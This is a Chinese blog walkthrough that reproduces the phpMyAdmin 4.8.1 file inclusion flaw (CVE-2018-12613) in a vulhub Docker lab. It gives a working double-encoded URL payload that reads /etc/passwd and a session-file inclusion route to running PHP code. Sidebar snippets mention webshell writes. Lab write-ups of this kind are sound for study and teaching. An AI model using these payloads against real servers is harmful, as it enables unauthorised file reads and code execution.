phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)(Kali)

已于 2022-05-01 16:27:19 修改
阅读量320 收藏
点赞数 1
分类专栏: kali 文章标签: 安全
于 2022-05-01 16:24:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58262663/article/details/124528227
版权

phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。

通过vulhub靶场进行复现操作

1.首先搭建靶场环境(采用Kali)

cd vulhub/phpmyadmin/CVE-2018-12613  //进入对应漏洞目录,具体参照vulhub.org

sudo docker-compose build           //编译相对应环境           

sudo docker-compose -up -d         //搭建靶场环境

搭建成功

环境启动后,访问http://your-ip:8080,即可进入phpmyadmin。配置的是“config”模式,所以无需输入密码,直接登录test账户。(确保8080端口不被占用才能正常启动靶场环境,8080端口占用原因可能是靶场环境未关闭)

lsof -i:8080   //查看8080端口状态,可反映进程的PID号

kill PID号     //解除占用

cd ..     //返回上级目录  
  
cd ~      //打开当前用户的主目录  
    
cd -      //返回进入目录  
  
cd /      //打开根目录  


重新进行靶场启动,即可正常启动

进入成功

漏洞复现

访问http://your-ip:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd,可见/etc/passwd被读取,说明文件包含漏洞存在:

 利用方式也比较简单,可以执行一下SELECT '<?=phpinfo()?>';,然后查看自己的sessionid(cookie中phpMyAdmin的值),然后包含session文件即可:

总结:该漏洞操作简单,不用复杂的操作,很适合新手练练手!

最后别忘了关机靶场环境噢    sudo docker-compose down

GK_Szero
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
phpmyadmin 远程文件包含漏洞CVE-2018-12613) - tdcoming'blog QQ group 906
08-04
漏洞背景背景介绍phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具…阅读数 156博文CVE-2018-12613 --- 本地文件包含造成
phpMyAdmin 4.8.1后台文件包含漏洞Getshell的几种姿势
qq_45521281的博客
04-27 2327
phpmyadmin 4.8.1 远程文件包含漏洞CVE-2018-12613phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑, 通过二次编码即可绕过检查,造成远程文件包含漏洞。 受影响版本: phpMyAdmin 4.8.0和4.8.1受到影响。 登陆phpmyadmin后台: 访问 http://192.168.0.13...
CVECVE-2018-12613:windows 复现 phpMyAdmin 本地文件包含造成远程代码执行漏洞
边扯边淡
11-24 817
起序:在做 Web 题遇到的,复现一下。 一、靶场环境 VMware Workstation 15.5 Pro cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso phpStudy 2018 phpMyAdmin-4.8.1-all-languages 二、漏洞分析 1、本地文件包含 LFI(本地文件包含),是指当服务器开启 allow_url_include 选项时,就可以通过php的某些特性函数 include(),require()和inclu
CVE-2018-12613 Phpmyadmin文件包含漏洞
weixin_51339377的博客
03-17 506
phpMyAdmin文件包含漏洞 利用条件: phpMyAdmin 4.8.0-4.8.1版本 用户已经拥有登录进入phpmyadmin后台的账号和密码 phpmyadmin配置文件位置 WWW\phpMyAdmin4.8.0\libraries\config.default.php 以下情况下攻击者在phpmyadmin中被重定向和加载,以及对白名单页面进行不正确的测试不需要身份验证: $cfg['AllowArbitraryServer']=true #攻击者可以指定.
服务攻防-数据库安全-服务应用的安全问题以及测试流程-Mysql&Hadoop&未授权访问&RCE-漏洞复现
ran的博客
05-05 3020
因为其服务是放在内网主机上面的,在内网内开了许多服务(端口 ),比如web和数据库,但是其只将web映射到外网,所以我们只能看到其服务在外网是开的,但是在进行扫描的时候我们扫描的仅仅是组网主机,而组网主机会将数据转发到内网再做处理,所以我们检测不到对应服务端口的开放。有些服务是通过口令验证来去判断服务的启动和禁用的,比如数据库里面有一些数据库里面就内置的数据库的用户,包括账号和密码,如果说设置的这个账号和密码过于简单的话,那么攻击者就可以通过弱口令的猜解得到账号以及密码之后进入,来进行一些安全的测试。
phpMyAdmin 未授权Getshell
蚁景网安学院
02-01 614
做渗透测试的时候偶然发现,phpmyadmin少见的打法,以下就用靶场进行演示了。环境搭建使用metasploitable2,发现phpmyadmin,如果这个时候无法登陆,且也没有前台的漏洞,可以继续在这个phpmyadmin目录下做文章。
phpmyadmin渗透小技巧
https://www.cnblogs.com/zpchcbd/
09-10 1028
只是单纯的记录给自己看的哈 如果大家看到不要嫌弃 一些建站软件或者傻瓜式的搭建软件phpmyadmin常会在888、999的端口 我们可以尝试用nikto进行检测相应的未授权漏洞 nikto -host http://测试域名地址:999/ setup这个目录有时候管理员不会关闭 因为默认安装的 隐患很大哈 恰恰也能利用 自己能够直接未授权进行操作 我们可以直接新建服务器 在认证页面的时候 ...
CVE-2018-12613 phpmyadmin 4.8.1 远程文件包含漏洞
weixin_51387754的博客
12-07 2755
漏洞简介 phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞漏洞环境 执行如下命令,启动phpmyadmin 4.8.1: docker-compose up -d 环境启动后,访问http://your-ip:8080,即可进入phpmyadmin。配置的是“config”模式,所以无需输入密码,直接登录test账户。 漏洞复现 访问http://your-ip:8080/index.ph
宝塔 phpmyadmin未授权访问漏洞
初岄的博客
07-26 1961
宝塔 phpmyadmin未授权访问漏洞
phpmyadmin漏洞复现】CVE-2016-5734远程代码执行漏洞+CVE-2018-12613文件包含漏洞+WooYun-2016-199433反序列化漏洞
serendipity1130的博客
09-01 819
CVE-2016-5734 1.访问8080端口,用弱口令root root登录 2. 在Kali中有自带的EXP: searchsploit phpmyadmin 3.进入该目录:/usr/share/exploitdb/exploits/php/webapps,通过EXP写入一句话木马: python3 40185.py -u root --pwd="root" http://192.168.225.139:8080/ -c "file_put_contents('shell.php'
phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959)-附件资源
03-02
phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959)-附件资源
Phpmyadmin后台代码执行CVE-2016-5734_poc
09-30
CVE-2016-5734在exploit-db上也就是 phpMyAdmin 4.6.2 - Authenticated Remote Code Execution ,意即phpMyAdmin认证用户的远程代码执行,根据描述可知受影响的phpMyAdmin所有的 4.6.x 版本(直至 4.6.3),4.4.x ...
phpmyadmin反序列化漏洞
qq_53008544的博客
05-01 521
phpMyAdmin的Setup脚本用于生成配置。如果远程攻击者向该脚本提交了特制的POST请求的话,就可能在生成的config.inc.php配置文件中包含任意PHP代码。由于配置文件被保存到了服务器上,未经认证的远程攻击者可以利用这个漏洞执行任意PHP代码。
CVE-2018-12613Phpmyadmin后台 任意文件包含漏洞复现
weixin_55821558的博客
04-26 723
环境:php 5.5.30 工具:phpstudy(小皮面板) 这个漏洞是源于phpmyadmin中的index.php,下面是源码: 以上进行一下分析: 1.传入的target不能为空 2.必须是一个字符串 3.不能以index开头 4.不能再数组target_blacklist中 5.且经过checkPageValidit检查后为真 首先前三个都很好理解 我们先看一下第四个 黑名单为: 在index.php中,已经事先定义了target_blacklist的值,即import.php和ex
CVE-2018-12613 本地文件包含漏洞复现+漏洞分析
qq_39407165的博客
06-07 115
phpMyAdminphpMyAdmin团队开发的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。CVE-2018-12613,这是一个在phpMyAdmin4.8.x(4.8.2之前)上发现的文件包含漏洞,攻击者可以利用该漏洞在后台进行任意的文件包含。也就也为着攻击者可以通过webshell直接拿下搭建了该服务的站点。
Kevg靶机渗透实现 8080端口 8081端口 1322端口实现
哼哼唧唧
12-04 1806
先使用ifconfig查看本机ip: 用nmap工具扫描本机ip段下的主机: 发现目标靶机ip为192.168.152.134 查看目标靶机开放了哪些端口: 发现80,8080,8081,9000端口上开放了HTTP服务,1322端口开放了SSH服务,可以作为漏洞突破点通过搜索可以发现,有一个对于此系统的漏洞扫描工具joomscan,扫描此网页: 有很多此系统的漏洞,这里我选择CVE-2008-3681,是远程修改密码,通过点击链接进入,发现已经给出实例: 我们用这种方法尝试对于8081端口进行修改 先输入
文件包含漏洞--phpMyAdmin 4.8.1
xiesiyuan1的博客
02-16 919
需要同时满足条件(参数target不为空、是字符串、不以index开头(此时如果需要加载index文件去绕过,可尝试使用xxx/../index.php)、不在数组target_blacklist中(此处也可以用xxx/../index.php的方式绕过 )、在checkPageValidity()函数中返回真)才能得到参数。因为此靶场可以对数据库直接操作,我们可以直接查找数据库文件(/MySql/data/数据库名/表名.frm),并且直接新建表,将字段名命名为一句话木马,从而将一句话木马包含进去。
守护长者安全,平安养老险携手福海街道开展防灾减灾活动
最新发布
NewsMash的博客
05-15 133
展望未来,平安养老险深圳分公司将持续与更多养老社区携手开展系列活动,合计赠送1000份灭火袋,并推出更多关爱老年人的举措,以实际行动为构建安全、和谐的养老环境贡献力量,为老年人的金色晚年添上温暖色彩,让他们的生活更加安心、舒心。老人们在台下听的投入,并在互动环节踊跃提问。作为平安集团服务养老、保障民生的重要“窗口”,平安养老险始终坚持金融工作的政治性、人民性,以满足人民日益增长的美好生活需要作为高质量发展的出发点和落脚点,公司期待与更多关心老年人福祉的人士携手,共筑“老有所养、老有所依”的中国梦。
CVE-2016-5734
09-04
CVE-2016-5734是一个针对PHPMyAdmin漏洞,该漏洞允许远程攻击者执行任意命令。该漏洞可以通过使用提供的Python脚本来利用,脚本可以在指定的URL上执行特定命令。如果你想进一步了解该漏洞以及如何分析它,可以参考...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值